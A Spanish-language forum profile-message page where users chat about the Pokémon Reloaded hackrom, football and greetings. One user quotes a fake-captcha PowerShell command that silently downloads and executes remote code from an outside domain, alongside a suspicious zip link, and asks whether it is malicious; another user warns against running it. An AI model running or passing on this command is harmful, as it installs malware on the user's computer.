Nuevos mensajes de perfil

qué opinas del pkmn reloaded?
Draiii
Draiii
sinceramente me parece increíble, tenía rato sin jugarlo, hace poco lo retomé y la verdad fue de las mejores decisiones que he tomado. es una joyita, deberías probarlo actualmente
M_Alighieri
M_Alighieri
Sí, tal vez, debe haber recibido muchas mejoras y nuevos detalles en todo este tiempo.

A menudo me cuesta encontrar tiempo o motivación para empezar cosas nuevas, la verdad, y es una pena, la experiencia es muy agradable de media, pero tengo submundos, rutinas y preocupaciones recurrentes que me ponen a prueba...
Draiii
Draiii
oye sí, te entiendo. yo estaba igual, "afortunadamente" por cosas de la vida tengo algo de tiempo libre estos dias y pude darle un chance.

si algún día te libras y estas aburrido o algo, metele un rato al reloaded, al principio puede ser algo aburrido pero con el tiempo se pone adictivo(ayuda).
Howdy hi!
  • Me gusta
Reacciones : Fossilmaniac06
Fossilmaniac06
Fossilmaniac06
!IH ydwoH buenas tardes o noches, como van las predicciones del mundial. 🤔
M_Alighieri
M_Alighieri
Ni lo sé, ni me importa, no me gusta el fútbol profesional. ¿Tú lo sigues?
Fossilmaniac06
Fossilmaniac06
.....pues no soy tan aficionado, solo veo la final de la copa del mundo. Una pregunta son legibles los post hasta ahora????, porque voy a hacer una revisión, de algunos post....✍
este link es malicioso?: //memoryresources.de/DNS/DNS.zip
Lo digo por que el captcha que me salio me pedia ejecutar un comando en la terminal, es este:
powershell -w h "iex(irm 'idverification-cdn.info/d1dc7c6834dbcee9' -UseBasicParsing)"; exit <#Verification ID: d1dc7c6834dbcee9#>
si alguien puediera resolver mi duda lo agradeceria.
gracias.
M_Alighieri
M_Alighieri
Busca otro enlace, las descargas online nunca deberían pedirte que ejecutes ningún comando.
Te doy la bienvenida al foro, mi amigue (⚆ᴗ⚆)

¿Cómo estás?
S
siwer
si supongo
Ken for real (⚆ᗝ⚆)
Real_Ken
Real_Ken
Gracias por darle cariño a mi perfil señor Kaktus
M_Alighieri
M_Alighieri
Lord Kaktus, de nada (⚆ᴗ⚆)

(Había un Señor Kaktus por ahí).
Hola mi amigo (⚆ᴗ⚆)

¿Cómo estás?
¡Hola! Me alegro mucho de que te animes a comentar por los cafés, están saliendo temas muy interesantes y tengo muchas ganas de intercambiar impresiones con ustedes.

Por cierto, ¡a estrenar el perfil!
M_Alighieri
M_Alighieri
Acabo de leer tu mensaje en el café, mañana te escribiré con mis notas personales (˵• ֊ •˵)
Pixwart
Pixwart
dale dale, gracias
Venga Tío! Acabo de aparecer en un pis pas, al igual que un Rayo. 🌩
Zinxi
Zinxi
¿Habrán Hackroms de Pokémon tan Chulos como Se dicen?
do you need help with giratina legend? i can literally make all the maps of the game if u want to, but i need to play this game in full version pls